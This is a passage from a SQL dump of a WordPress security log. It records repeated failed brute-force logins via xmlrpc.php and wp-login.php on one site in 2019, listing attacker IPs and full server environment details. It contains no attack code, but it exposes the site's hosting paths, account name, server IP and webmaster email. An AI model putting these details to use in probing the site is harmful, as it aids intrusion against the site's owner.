15:49:14',17739584,19230352,'https://bintara.com.my/wp-login.php',1,0,'37.187.75.56'),(24621,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.75.56\";s:11:\"REMOTE_PORT\";s:5:\"46320\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEAfUViJhUiKk@yAoeuoAAAAZQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568735357.2045\";s:12:\"REQUEST_TIME\";s:10:\"1568735357\";}}','notice','2019-09-17 15:49:18','2019-09-17 15:49:17',18257776,19556712,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.75.56'),(24622,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"107.161.24.34\";s:11:\"REMOTE_PORT\";s:5:\"36184\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEBgUViJhUiKk@yAoevIAAAAZQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568735617.6932\";s:12:\"REQUEST_TIME\";s:10:\"1568735617\";}}','notice','2019-09-17 15:53:38','2019-09-17 15:53:38',17739944,19230904,'https://bintara.com.my/wp-login.php',1,0,'107.161.24.34'),(24623,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"107.161.24.34\";s:11:\"REMOTE_PORT\";s:5:\"37660\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEBhH-mRYMgL5SYt2EK6AAAAVI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568735620.5492\";s:12:\"REQUEST_TIME\";s:10:\"1568735620\";}}','notice','2019-09-17 15:53:42','2019-09-17 15:53:40',18256264,19555256,'https://bintara.com.my/xmlrpc.php',1,0,'107.161.24.34'),(24624,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"207.180.244.235\";s:11:\"REMOTE_PORT\";s:5:\"49818\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEDDn-mRYMgL5SYt2ELfgAAAUI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568736015.3971\";s:12:\"REQUEST_TIME\";s:10:\"1568736015\";}}','notice','2019-09-17 16:00:17','2019-09-17 16:00:15',17740832,19232928,'https://bintara.com.my/wp-login.php',1,0,'207.180.244.235'),(24625,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"207.180.244.235\";s:11:\"REMOTE_PORT\";s:5:\"51548\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEDFMptRwTKB9qWFzHcqgAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568736020.9682\";s:12:\"REQUEST_TIME\";s:10:\"1568736020\";}}','notice','2019-09-17 16:00:22','2019-09-17 16:00:21',18258376,19555792,'https://bintara.com.my/xmlrpc.php',1,0,'207.180.244.235'),(24626,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"35204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEDKUViJhUiKk@yAoewLgAAAY8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568736041.6256\";s:12:\"REQUEST_TIME\";s:10:\"1568736041\";}}','notice','2019-09-17 16:00:43','2019-09-17 16:00:42',17740096,19232072,'https://bintara.com.my/wp-login.php',1,0,'166.62.36.222'),(24627,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"35936\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEDLPgg4cIpXyxKa541RAAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568736044.5675\";s:12:\"REQUEST_TIME\";s:10:\"1568736044\";}}','notice','2019-09-17 16:00:45','2019-09-17 16:00:44',18256992,19555784,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.36.222'),(24628,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"144.217.75.27\";s:11:\"REMOTE_PORT\";s:5:\"54488\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEEeUViJhUiKk@yAoexZQAAAY4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568736377.1116\";s:12:\"REQUEST_TIME\";s:10:\"1568736377\";}}','notice','2019-09-17 16:06:18','2019-09-17 16:06:17',17737944,19228936,'https://bintara.com.my/wp-login.php',1,0,'144.217.75.27'),(24629,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"144.217.75.27\";s:11:\"REMOTE_PORT\";s:5:\"55528\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEEe0ViJhUiKk@yAoexagAAAZM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568736380.0392\";s:12:\"REQUEST_TIME\";s:10:\"1568736380\";}}','notice','2019-09-17 16:06:21','2019-09-17 